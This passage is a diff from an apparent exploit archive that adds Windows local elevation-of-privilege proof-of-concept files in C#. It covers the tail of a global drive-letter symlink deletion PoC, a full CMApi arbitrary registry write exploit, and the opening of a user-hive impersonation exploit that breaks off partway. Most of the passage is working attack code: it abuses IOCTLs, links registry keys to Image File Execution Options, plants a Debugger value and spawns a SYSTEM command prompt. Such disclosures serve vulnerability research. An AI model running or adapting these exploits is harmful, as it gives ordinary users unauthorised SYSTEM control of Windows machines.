SafeKernelObjectHandle OpenDirectory(string path) + { + using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive)) + { + IntPtr handle; + StatusToNtException(NtOpenDirectoryObject(out handle, DirectoryAccessRights.MaximumAllowed, obja)); + return new SafeKernelObjectHandle(handle, true); + } + } + + [DllImport("ntdll.dll")] + static extern int NtOpenSymbolicLinkObject( + out IntPtr LinkHandle, + GenericAccessRights DesiredAccess, + ObjectAttributes ObjectAttributes + ); + + [DllImport("ntdll.dll")] + static extern int NtMakeTemporaryObject(SafeKernelObjectHandle ObjectHandle); + + static SafeKernelObjectHandle OpenSymbolicLink(SafeKernelObjectHandle directory, string path, GenericAccessRights access_rights) + { + using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, directory, null, null)) + { + IntPtr handle; + if (NtOpenSymbolicLinkObject(out handle, access_rights, obja) != 0) + { + return null; + } + + return new SafeKernelObjectHandle(handle, true); + } + } + + static void SetDosDirectory(SafeKernelObjectHandle directory) + { + IntPtr p = directory.DangerousGetHandle(); + byte[] data = null; + if (IntPtr.Size == 4) + { + data = BitConverter.GetBytes(p.ToInt32()); + } + else + { + data = BitConverter.GetBytes(p.ToInt64()); + } + + StatusToNtException(NtSetInformationProcess(new IntPtr(-1), ProcessDeviceMap, data, data.Length)); + } + + static void Main(string[] args) + { + try + { + if (args.Length < 2) + { + Console.WriteLine(@"DeleteGlobalDrivePoC \\dfs\share X:"); + return; + } + + string dfs_path = args[0]; + string drive_path = args[1]; + + if (!Path.IsPathRooted(dfs_path) || !dfs_path.StartsWith(@"\\")) + throw new ArgumentException("DFS path must be a UNC path"); + if (drive_path.Length != 2 || !Char.IsLetter(drive_path[0]) || drive_path[1] != ':') + throw new ArgumentException("Drive letter must of form X:"); + + SafeKernelObjectHandle dir = CreateDirectory(null); + + SafeKernelObjectHandle global = OpenDirectory(@"\GLOBAL??"); + using (SafeKernelObjectHandle symlink = OpenSymbolicLink(global, drive_path, GenericAccessRights.GenericRead)) + { + if (symlink == null) + { + Console.WriteLine("[ERROR]: Drive letter does existing in global device directory"); + return; + } + } + + SetDosDirectory(dir); + MountDfsShare(dfs_path, drive_path); + SetDosDirectory(global); + UnmountDfsShare(drive_path); + + using (SafeKernelObjectHandle symlink = OpenSymbolicLink(global, drive_path, GenericAccessRights.GenericRead)) + { + if (symlink == null) + { + Console.WriteLine("[SUCCESS]: Deleted the {0} symlink", drive_path); + } + else + { + Console.WriteLine("[ERROR]: Symlink still in global directory"); + } + } + } + catch (Exception ex) + { + Console.WriteLine("[ERROR]: {0}", ex.Message); + } + } + } +} diff --git a/platforms/windows/local/40573.cs b/platforms/windows/local/40573.cs new file mode 100755 index 000000000..7ea2388a5 --- /dev/null +++ b/platforms/windows/local/40573.cs @@ -0,0 +1,883 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=872 + +Windows: DeviceApi CMApi PiCMOpenClassKey Arbitrary Registry Key Write EoP +Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7 +Class: Elevation of Privilege + +Summary: +The DeviceApi CMApi PiCMOpenClassKey IOCTL allows a normal user to create arbitrary registry keys in the system hive leading to elevation of privilege. + +Description: + +The DeviceApi is a driver implemented inside the kernel which exposes a number of devices. One of those is CMApi which presumably is short for configuration manager API as it primarily exposes device configuration from the registry to the caller. The device exposes calls using IOCTLs, in theory anything which “creates” or “deletes” an object is limited behind an access check which only administrators have access to. However certain calls feed into the call PnpCtxRegCreateTree which will allow a user to open parts of the registry, and if they’re not there will create the keys. This is a problem as the keys are created in the user’s context using ZwCreateKey but without forcing an access check (it does this intentionally, as otherwise the user couldn’t create the key). All we need to do is find a CMApi IOCTL which will create the arbitrary keys for us. + +Fortunately it’s not that simple, all the ones I find using the tree creation function verify that string being passed from the user meets some valid criteria and is always placed into a subkey which the user doesn’t have direct control over. However I noticed PiCMOpenDeviceKey allows a valid 3 part path, of the form ABC\DEF\XYZ to be specified and the only criteria for creating this key is it exists as a valid device under CurrentControlSet\Enum, however the keys will be created under CurrentControlSet\Hardware Profiles which doesn’t typically exist. The majority of calls to this IOCTL will apply a very restrictive security descriptor to the new keys, however if you specify the 0x200 device type flag it will use the default SD which will be inherited from the parent key. Even if this didn’t provide a useful ACE (in this case it has the default CREATOR OWNER giving full access) as it’s created under our user context we are the owner and so could rewrite the DACL anyway. + +To convert this into a full arbitrary write we can specify a device path which doesn’t already exist and it will create the three registry keys. If we now delete the last key and replace it with a symbolic link we can point it at any arbitrary key. As the system hive is trusted this isn’t affected by the inter-hive symbolic link protections (and at anyrate services is in the same hive), however this means that the exploit won’t work from low-IL due to restrictions on creating symbolic links from sandboxes. + +You should be treating anything which calls PnpCtxRegCreateTree or SysCtxRegCreateKey as suspect, especially if no explicit security descriptor is being passed. For example you can use PiCMOpenDeviceInterfaceKey to do something very similar and get an arbitrary Device Parameters key created with full control for any device interface which doesn’t already have one. You can’t use the same symbolic link trick here (you only control the leaf key) however there might be a driver which has exploitable behaviour if the user can create a arbitrary Device Parameters key. + +Proof of Concept: + +I’ve provided a PoC as a C# source code file. You need to compile it first targeted .NET 4 and above. It will create a new IFEO for a executable we know can be run from the task scheduler at system. + +1) Compile the C# source code file. +2) Execute the PoC executable as a normal user. +3) The PoC should print that it successfully created the key. You should find an interactive command prompt running at system on the desktop. + +Expected Result: +The key access should fail, or at least the keys shouldn’t be writable by the current user. + +Observed Result: +The key access succeeds and a system level command prompt is created. +*/ + +using Microsoft.Win32; +using Microsoft.Win32.SafeHandles; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Security.AccessControl; +using System.Text; +using System.Threading; + +namespace PoC +{ + class Program + { + [Flags] + public enum AttributeFlags : uint + { + None = 0, + Inherit = 0x00000002, + Permanent = 0x00000010, + Exclusive = 0x00000020, + CaseInsensitive = 0x00000040, + OpenIf = 0x00000080, + OpenLink = 0x00000100, + KernelHandle = 0x00000200, + ForceAccessCheck = 0x00000400, + IgnoreImpersonatedDevicemap = 0x00000800, + DontReparse = 0x00001000, + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class UnicodeString + { + ushort Length; + ushort MaximumLength; + [MarshalAs(UnmanagedType.LPWStr)] + string Buffer; + + public UnicodeString(string str) + { + Length = (ushort)(str.Length * 2); + MaximumLength = (ushort)((str.Length * 2) + 1); + Buffer = str; + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class ObjectAttributes : IDisposable + { + int Length; + IntPtr RootDirectory; + IntPtr ObjectName; + AttributeFlags Attributes; + IntPtr SecurityDescriptor; + IntPtr SecurityQualityOfService; + + private static IntPtr AllocStruct(object s) + { + int size = Marshal.SizeOf(s); + IntPtr ret = Marshal.AllocHGlobal(size); + Marshal.StructureToPtr(s, ret, false); + return ret; + } + + private static void FreeStruct(ref IntPtr p, Type struct_type) + { + Marshal.DestroyStructure(p, struct_type); + Marshal.FreeHGlobal(p); + p = IntPtr.Zero; + } + + public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr rootkey) + { + Length = Marshal.SizeOf(this); + if (object_name != null) + { + ObjectName = AllocStruct(new UnicodeString(object_name)); + } + Attributes = flags; + RootDirectory = rootkey; + } + + public ObjectAttributes(string object_name, AttributeFlags flags) + : this(object_name, flags, IntPtr.Zero) + { + } + + public void Dispose() + { + if (ObjectName != IntPtr.Zero) + { + FreeStruct(ref ObjectName, typeof(UnicodeString)); + } + GC.SuppressFinalize(this); + } + + ~ObjectAttributes() + { + Dispose(); + } + } + + [Flags] + public enum LoadKeyFlags + { + None = 0, + AppKey = 0x10, + Exclusive = 0x20, + Unknown800 = 0x800, + ReadOnly = 0x2000, + } + + [Flags] + public enum GenericAccessRights : uint + { + None = 0, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + public class NtException : ExternalException + { + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern IntPtr GetModuleHandle(string modulename); + + [Flags] + enum FormatFlags + { + AllocateBuffer = 0x00000100, + FromHModule = 0x00000800, + FromSystem = 0x00001000, + IgnoreInserts = 0x00000200 + } + + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern int FormatMessage( + FormatFlags dwFlags, + IntPtr lpSource, + int dwMessageId, + int dwLanguageId, + out IntPtr lpBuffer, + int nSize, + IntPtr Arguments + ); + + [DllImport("kernel32.dll")] + private static extern IntPtr LocalFree(IntPtr p); + + private static string StatusToString(int status) + { + IntPtr buffer = IntPtr.Zero; + try + { + if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts, + GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0) + { + return Marshal.PtrToStringUni(buffer); + } + } + finally + { + if (buffer != IntPtr.Zero) + { + LocalFree(buffer); + } + } + return String.Format("Unknown Error: 0x{0:X08}", status); + } + + public NtException(int status) : base(StatusToString(status)) + { + } + } + + public static void StatusToNtException(int status) + { + if (status < 0) + { + throw new NtException(status); + } + } + + + [Flags] + public enum FileOpenOptions + { + None = 0, + DirectoryFile = 0x00000001, + WriteThrough = 0x00000002, + SequentialOnly = 0x00000004, + NoIntermediateBuffering = 0x00000008, + SynchronousIoAlert = 0x00000010, + SynchronousIoNonAlert = 0x00000020, + NonDirectoryFile = 0x00000040, + CreateTreeConnection = 0x00000080, + CompleteIfOplocked = 0x00000100, + NoEaKnowledge = 0x00000200, + OpenRemoteInstance = 0x00000400, + RandomAccess = 0x00000800, + DeleteOnClose = 0x00001000, + OpenByFileId = 0x00002000, + OpenForBackupIntent = 0x00004000, + NoCompression = 0x00008000, + OpenRequiringOplock = 0x00010000, + ReserveOpfilter = 0x00100000, + OpenReparsePoint = 0x00200000, + OpenNoRecall = 0x00400000, + OpenForFreeSpaceQuery = 0x00800000 + } + + public class IoStatusBlock + { + public IntPtr Pointer; + public IntPtr Information; + + public IoStatusBlock(IntPtr pointer, IntPtr information) + { + Pointer = pointer; + Information = information; + } + + public IoStatusBlock() + { + } + } + + [Flags] + public enum ShareMode + { + None = 0, + Read = 0x00000001, + Write = 0x00000002, + Delete = 0x00000004, + } + + [Flags] + public enum FileAccessRights : uint + { + None = 0, + ReadData = 0x0001, + WriteData = 0x0002, + AppendData = 0x0004, + ReadEa = 0x0008, + WriteEa = 0x0010, + Execute = 0x0020, + DeleteChild = 0x0040, + ReadAttributes = 0x0080, + WriteAttributes = 0x0100, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + [DllImport("ntdll.dll")] + public static extern int NtOpenFile( + out IntPtr FileHandle, + FileAccessRights DesiredAccess, + ObjectAttributes ObjAttr, + [In] [Out] IoStatusBlock IoStatusBlock, + ShareMode ShareAccess, + FileOpenOptions OpenOptions); + + [DllImport("ntdll.dll")] + public static extern int NtDeviceIoControlFile( + SafeFileHandle FileHandle, + IntPtr Event, + IntPtr ApcRoutine, + IntPtr ApcContext, + [In] [Out] IoStatusBlock IoStatusBlock, + uint IoControlCode, + SafeHGlobalBuffer InputBuffer, + int InputBufferLength, + SafeHGlobalBuffer OutputBuffer, + int OutputBufferLength + ); + + static T DeviceIoControl(SafeFileHandle FileHandle, uint IoControlCode, object input_buffer) + { + using (SafeStructureOutBuffer output = new SafeStructureOutBuffer()) + { + using (SafeStructureBuffer input = new SafeStructureBuffer(input_buffer)) + { + IoStatusBlock status = new IoStatusBlock(); + StatusToNtException(NtDeviceIoControlFile(FileHandle, IntPtr.Zero, IntPtr.Zero, + IntPtr.Zero, status, IoControlCode, input, input.Length, + output, output.Length)); + + return output.Result; + } + } + } + + public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit) + { + AttributeFlags flags = AttributeFlags.CaseInsensitive; + if (inherit) + flags |= AttributeFlags.Inherit; + using (ObjectAttributes obja = new ObjectAttributes(name, flags)) + { + IntPtr handle; + IoStatusBlock iostatus = new IoStatusBlock(); + StatusToNtException(NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions)); + return new SafeFileHandle(handle, true); + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + class CmApiOpenKeyData + { + public int cbSize; // 0 + public int device_type; // 4 + public int callback_id; // 8 + [MarshalAs(UnmanagedType.LPWStr)] + public string name; // c + public int name_size; // 10 + public GenericAccessRights desired_access; // 14 + public int create; // 18 + public int hardware_id; // 1c + public int return_data_size; // 20 + + public CmApiOpenKeyData(int device_type, int callback_id, string name, GenericAccessRights desired_access, bool create, int hardware_id, int return_data_size) + { + this.cbSize = Marshal.SizeOf(this); + this.device_type = device_type; + this.callback_id = callback_id; + this.name = name; + this.name_size = (name.Length + 1) * 2; + this.desired_access = desired_access; + this.create = create ? 1 : 0; + this.hardware_id = hardware_id; + this.return_data_size = return_data_size; + } + } + + [StructLayout(LayoutKind.Sequential)] + class CmApiOpenKeyResult + { + int size; + public int status; + public long handle; + }; + + public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid + { + public SafeHGlobalBuffer(int length) + : this(Marshal.AllocHGlobal(length), length, true) + { + } + + public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) + : base(owns_handle) + { + Length = length; + SetHandle(buffer); + } + + public int Length + { + get; private set; + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.FreeHGlobal(handle); + handle = IntPtr.Zero; + } + return true; + } + } + + public class SafeStructureBuffer : SafeHGlobalBuffer + { + Type _type; + + public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value)) + { + _type = value.GetType(); + Marshal.StructureToPtr(value, handle, false); + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.DestroyStructure(handle, _type); + } + return base.ReleaseHandle(); + } + } + + public class SafeStructureOutBuffer : SafeHGlobalBuffer + { + public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T))) + { + } + + public T Result + { + get + { + if (IsInvalid) + throw new ObjectDisposedException("handle"); + + return Marshal.PtrToStructure(handle); + } + } + } + + static void EnumKeys(RegistryKey rootkey, IEnumerable name_parts, List names, int maxdepth, int current_depth) + { + if (current_depth == maxdepth) + { + names.Add(String.Join(@"\", name_parts)); + } + else + { + foreach (string subkey in rootkey.GetSubKeyNames()) + { + using (RegistryKey key = rootkey.OpenSubKey(subkey)) + { + if (key != null) + { + EnumKeys(key, name_parts.Concat(new string[] { subkey }), names, maxdepth, current_depth + 1); + } + } + } + } + } + + static IEnumerable GetValidDeviceNames() + { + List names = new List(); + using (RegistryKey rootkey = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Enum")) + { + EnumKeys(rootkey, new string[0], names, 3, 0); + } + return names; + } + + static RegistryKey OpenProfileKey(string name) + { + RegistryKey ret = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Hardware Profiles\0001\SYSTEM\CurrentControlSet\Enum"); + if (name != null) + { + try + { + return ret.OpenSubKey(name); + } + finally + { + ret.Close(); + } + } + else + { + return ret; + } + } + + static string FindFirstAccessibleDevice() + { + foreach (string device in GetValidDeviceNames()) + { + try + { + using (RegistryKey key = OpenProfileKey(device)) + { + if (key == null) + { + return device; + } + } + } + catch { } + } + + return null; + } + + [Flags] + enum KeyCreateOptions + { + None = 0, + NonVolatile = None, + Volatile = 1, + CreateLink = 2, + BackupRestore = 4, + } + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + static extern int NtCreateKey( + out IntPtr KeyHandle, + GenericAccessRights DesiredAccess, + [In] ObjectAttributes ObjectAttributes, + int TitleIndex, + [In] UnicodeString Class, + KeyCreateOptions CreateOptions, + out int Disposition); + + static SafeRegistryHandle CreateKey(SafeRegistryHandle rootkey, string path, AttributeFlags flags, KeyCreateOptions options) + { + using (ObjectAttributes obja = new ObjectAttributes(path, flags | AttributeFlags.CaseInsensitive, rootkey != null ? rootkey.DangerousGetHandle() : IntPtr.Zero)) + { + IntPtr handle; + int disposition = 0; + StatusToNtException(NtCreateKey(out handle, GenericAccessRights.MaximumAllowed, obja, 0, null, options, out disposition)); + return new SafeRegistryHandle(handle, true); + } + } + + enum RegistryKeyType + { + Link = 6, + } + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + static extern int NtSetValueKey( + SafeRegistryHandle KeyHandle, + UnicodeString ValueName, + int TitleIndex, + RegistryKeyType Type, + byte[] Data, + int DataSize); + + [DllImport("ntdll.dll")] + static extern int NtDeleteKey(SafeRegistryHandle KeyHandle); + + static void DeleteSymbolicLink(SafeRegistryHandle rootkey, string path) + { + using (SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenLink | AttributeFlags.OpenIf, KeyCreateOptions.None)) + { + StatusToNtException(NtDeleteKey(key)); + } + } + + static SafeRegistryHandle CreateSymbolicLink(SafeRegistryHandle rootkey, string path, string target) + { + SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenIf | AttributeFlags.OpenLink, KeyCreateOptions.CreateLink); + try + { + UnicodeString value_name = new UnicodeString("SymbolicLinkValue"); + byte[] data = Encoding.Unicode.GetBytes(target); + StatusToNtException(NtSetValueKey(key, value_name, 0, RegistryKeyType.Link, data, data.Length)); + SafeRegistryHandle ret = key; + key = null; + return ret; + } + finally + { + if (key != null) + { + NtDeleteKey(key); + } + } + } + + static RegistryKey CreateDeviceKey(string device_name) + { + using (SafeFileHandle handle = OpenFile(@"\Device\DeviceApi\CMApi", FileAccessRights.Synchronize | FileAccessRights.GenericRead | FileAccessRights.GenericWrite, + ShareMode.None, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, false)) + { + CmApiOpenKeyData data = new CmApiOpenKeyData(0x211, 1, device_name, GenericAccessRights.MaximumAllowed, true, 0, Marshal.SizeOf(typeof(CmApiOpenKeyResult))); + CmApiOpenKeyResult result = DeviceIoControl(handle, 0x47085B, data); + StatusToNtException(result.status); + return RegistryKey.FromHandle(new SafeRegistryHandle(new IntPtr(result.handle), true)); + } + } + + + public enum TokenInformationClass + { + TokenSessionId = 12 + } + + [DllImport("ntdll.dll")] + public static extern int NtClose(IntPtr handle); + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + public static extern int NtOpenProcessTokenEx( + IntPtr ProcessHandle, + GenericAccessRights DesiredAccess, + AttributeFlags HandleAttributes, + out IntPtr TokenHandle); + + public sealed class SafeKernelObjectHandle + : SafeHandleZeroOrMinusOneIsInvalid + { + public SafeKernelObjectHandle() + : base(true) + { + } + + public SafeKernelObjectHandle(IntPtr handle, bool owns_handle) + : base(owns_handle) + { + SetHandle(handle); + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + NtClose(this.handle); + this.handle = IntPtr.Zero; + return true; + } + return false; + } + } + + public enum TokenType + { + Primary = 1, + Impersonation = 2 + } + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + public static extern int NtDuplicateToken( + IntPtr ExistingTokenHandle, + GenericAccessRights DesiredAccess, + ObjectAttributes ObjectAttributes, + bool EffectiveOnly, + TokenType TokenType, + out IntPtr NewTokenHandle + ); + + public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token) + { + IntPtr new_token; + + using (ObjectAttributes obja = new ObjectAttributes(null, AttributeFlags.None)) + { + StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(), + GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token)); + return new SafeKernelObjectHandle(new_token, true); + } + } + + public static SafeKernelObjectHandle OpenProcessToken() + { + IntPtr new_token; + StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1), + GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token)); + using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true)) + { + return DuplicateToken(ret); + } + } + + [DllImport("ntdll.dll")] + public static extern int NtSetInformationToken( + SafeKernelObjectHandle TokenHandle, + TokenInformationClass TokenInformationClass, + byte[] TokenInformation, + int TokenInformationLength); + + public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id) + { + byte[] buffer = BitConverter.GetBytes(session_id); + NtSetInformationToken(token, TokenInformationClass.TokenSessionId, + buffer, buffer.Length); + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + struct STARTUPINFO + { + public Int32 cb; + public string lpReserved; + public string lpDesktop; + public string lpTitle; + public Int32 dwX; + public Int32 dwY; + public Int32 dwXSize; + public Int32 dwYSize; + public Int32 dwXCountChars; + public Int32 dwYCountChars; + public Int32 dwFillAttribute; + public Int32 dwFlags; + public Int16 wShowWindow; + public Int16 cbReserved2; + public IntPtr lpReserved2; + public IntPtr hStdInput; + public IntPtr hStdOutput; + public IntPtr hStdError; + } + + [StructLayout(LayoutKind.Sequential)] + internal struct PROCESS_INFORMATION + { + public IntPtr hProcess; + public IntPtr hThread; + public int dwProcessId; + public int dwThreadId; + } + + enum CreateProcessFlags + { + CREATE_BREAKAWAY_FROM_JOB = 0x01000000, + CREATE_DEFAULT_ERROR_MODE = 0x04000000, + CREATE_NEW_CONSOLE = 0x00000010, + CREATE_NEW_PROCESS_GROUP = 0x00000200, + CREATE_NO_WINDOW = 0x08000000, + CREATE_PROTECTED_PROCESS = 0x00040000, + CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, + CREATE_SEPARATE_WOW_VDM = 0x00000800, + CREATE_SHARED_WOW_VDM = 0x00001000, + CREATE_SUSPENDED = 0x00000004, + CREATE_UNICODE_ENVIRONMENT = 0x00000400, + DEBUG_ONLY_THIS_PROCESS = 0x00000002, + DEBUG_PROCESS = 0x00000001, + DETACHED_PROCESS = 0x00000008, + EXTENDED_STARTUPINFO_PRESENT = 0x00080000, + INHERIT_PARENT_AFFINITY = 0x00010000 + } + + [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] + static extern bool CreateProcessAsUser( + IntPtr hToken, + string lpApplicationName, + string lpCommandLine, + IntPtr lpProcessAttributes, + IntPtr lpThreadAttributes, + bool bInheritHandles, + CreateProcessFlags dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref STARTUPINFO lpStartupInfo, + out PROCESS_INFORMATION lpProcessInformation); + + static void SpawnInteractiveCmd(int sessionid) + { + SafeKernelObjectHandle token = OpenProcessToken(); + SetTokenSessionId(token, sessionid); + + STARTUPINFO startInfo = new STARTUPINFO(); + startInfo.cb = Marshal.SizeOf(startInfo); + PROCESS_INFORMATION procInfo; + + CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe", + IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo); + } + + static bool DoExploit() + { + SafeRegistryHandle symbolic_link = null; + + try + { + string device_name = FindFirstAccessibleDevice(); + if (device_name != null) + { + Console.WriteLine("[SUCCESS]: Found Device: {0}", device_name); + } + else + { + throw new ArgumentException("Couldn't find a valid device"); + } + + using (RegistryKey key = CreateDeviceKey(device_name)) + { + StatusToNtException(NtDeleteKey(key.Handle)); + } + + Console.WriteLine("[SUCCESS]: Deleted leaf key"); + + using (RegistryKey profile_key = OpenProfileKey(null)) + { + symbolic_link = CreateSymbolicLink(profile_key.Handle, device_name, + @"\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe"); + } + + Console.WriteLine("[SUCCESS]: Created symbolic link"); + using (RegistryKey key = CreateDeviceKey(device_name)) + { + key.SetValue("Debugger", String.Format("\"{0}\" {1}", Assembly.GetCallingAssembly().Location, GetSessionId())); + Console.WriteLine("[SUCCESS]: Created IFEO key"); + EventWaitHandle ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\{376693BE-1931-4AF9-8D56-C629F9094745}"); + Process p = Process.Start("schtasks", @"/Run /TN ""\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"""); + ev.WaitOne(); + + NtDeleteKey(key.Handle); + } + } + catch (Exception ex) + { + Console.WriteLine("[ERROR]: {0}", ex.Message); + } + finally + { + if (symbolic_link != null) + { + NtDeleteKey(symbolic_link); + } + } + return false; + } + + static int GetSessionId() + { + using (Process p = Process.GetCurrentProcess()) + { + return p.SessionId; + } + } + + static void Main(string[] args) + { + if (GetSessionId() > 0) + { + DoExploit(); + } + else + { + Console.WriteLine("[SUCCESS]: Running as service"); + EventWaitHandle ev = EventWaitHandle.OpenExisting(@"Global\{376693BE-1931-4AF9-8D56-C629F9094745}", EventWaitHandleRights.Modify); + ev.Set(); + if (args.Length > 1) + { + int session_id; + if (!int.TryParse(args[0], out session_id)) + { + session_id = 0; + } + SpawnInteractiveCmd(session_id); + } + } + } + } +} \ No newline at end of file diff --git a/platforms/windows/local/40574.cs b/platforms/windows/local/40574.cs new file mode 100755 index 000000000..e1876cade --- /dev/null +++ b/platforms/windows/local/40574.cs @@ -0,0 +1,1003 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=875 + +Windows: DeviceApi CMApi User Hive Impersonation EoP +Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7 +Class: Elevation of Privilege + +Summary: +The DeviceApi CMApi PnpCtxRegOpenCurrentUserKey function doesn’t check the impersonation level of the current effective token allowing a normal user to create arbitrary registry keys in another user’s loaded hive leading to elevation of privilege. + +Description: + +For some of the CMApi IOCTLs you can specify a flag, 0x100 which indicates you want the keys to opened in the user’s hive rather than the system hive. It finds the root key by calling PnpCtxRegOpenCurrentUserKey which calls ZwQueryInformationToken for the TOKEN_USER structure, converts the SID to a string, appends it to \Registry\User and opens the key in kernel mode. No part of this process verifies that the effective token isn’t an impersonation token at identification level, this means that capturing another user’s token, or using something like S4U we can impersonate another logged on user and write registry keys into their hive. Combined with the fact that registry keys are created with kernel privileges (even when dealing with user hives, when it clearly shouldn’t) when the keys are actually created the access check is bypassed. + +The obvious way of exploiting this is to use the PiCMOpenDeviceKey IOCTL I’ve already reported in issue 34167. We can do a similar trick but instead symlink to keys inside the user’s hive to get elevation. One issue is that when the keys are created in kernel mode they’ll typically not be accessible by the user due to the default inherited permissions on a user’s hive. However there’s a winnable race between when the user hive is accessed and when the keys are created, by clearing the thread token from another thread at the right moment the user hive will be the target user but the keys are created as the current user. While this doesn’t directly give us access to the keys through the DACL it does mark us as the owner of the key and so we can open it for WRITE_DAC access and change the DACL to give us access, then do a similar symlink trick to 34167 to elevate privileges. + +Proof of Concept: + +I’ve provided a PoC as a C# source code file. You need to compile it first targeted .NET 4 and above. It requires some setup first, to create the other user. Also this only demonstrates the arbitrary creation, it doesn’t attempt to win the race condition. + +1) Compile the C# source code file. +2) Create a second user on the local system as an admin, start a program running as that user so that their hive is loaded (using either runas or fast user switching). +3) Execute the PoC executable as a normal user, passing as an argument the name of the other user +3) The PoC should print that it failed to get the key (this is related to the key being opened under identification level impersonation) however using a registry viewer observe that under HKU\User-SID\SYSTEM\CurrentControlSet\Enum the device key’s been created. + +Expected Result: +The key access should fail + +Observed Result: +The key creation succeeds inside the other user’s hive. +*/ + +using Microsoft.Win32; +using Microsoft.Win32.SafeHandles; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Net; +using System.Runtime.InteropServices; +using System.Security.Principal; + +namespace PoC +{ + /// + /// This sample uses S4U security, which requires Windows Server 2003 and a W2003 domain controller + /// Copied from pinvoke.net with minor changes to get it to actually work. + /// + public sealed class CCWinLogonUtilities + { + private CCWinLogonUtilities() + { + } + + #region "Win32 stuff" + private class Win32 + { + internal class OSCalls + { + public enum WinStatusCodes : uint + { + STATUS_SUCCESS = 0 + } + + public enum WinErrors : uint + { + NO_ERROR = 0, + } + public enum WinLogonType + { + LOGON32_LOGON_INTERACTIVE = 2, + LOGON32_LOGON_NETWORK = 3, + LOGON32_LOGON_BATCH = 4, + LOGON32_LOGON_SERVICE = 5, + LOGON32_LOGON_UNLOCK = 7, + LOGON32_LOGON_NETWORK_CLEARTEXT = 8, + LOGON32_LOGON_NEW_CREDENTIALS = 9 + } + + // SECURITY_LOGON_TYPE + public enum SecurityLogonType + { + Interactive = 2, // Interactively logged on (locally or remotely) + Network, // Accessing system via network + Batch, // Started via a batch queue + Service, // Service started by service controller + Proxy, // Proxy logon + Unlock, // Unlock workstation + NetworkCleartext, // Network logon with cleartext credentials + NewCredentials, // Clone caller, new default credentials + RemoteInteractive, // Remote, yet interactive. Terminal server + CachedInteractive, // Try cached credentials without hitting the net. + CachedRemoteInteractive, // Same as RemoteInteractive, this is used internally for auditing purpose + CachedUnlock // Cached Unlock workstation + } + + [StructLayout(LayoutKind.Sequential)] + public struct LSA_UNICODE_STRING + { + public UInt16 Length; + public UInt16 MaximumLength; + public IntPtr Buffer; + } + + [StructLayout(LayoutKind.Sequential)] + public struct TOKEN_SOURCE + { + public TOKEN_SOURCE(string name) + { + SourceName = new byte[8]; + System.Text.Encoding.GetEncoding(1252).GetBytes(name, 0, name.Length, SourceName, 0); + if (!AllocateLocallyUniqueId(out SourceIdentifier)) + throw new System.ComponentModel.Win32Exception(); + } + + 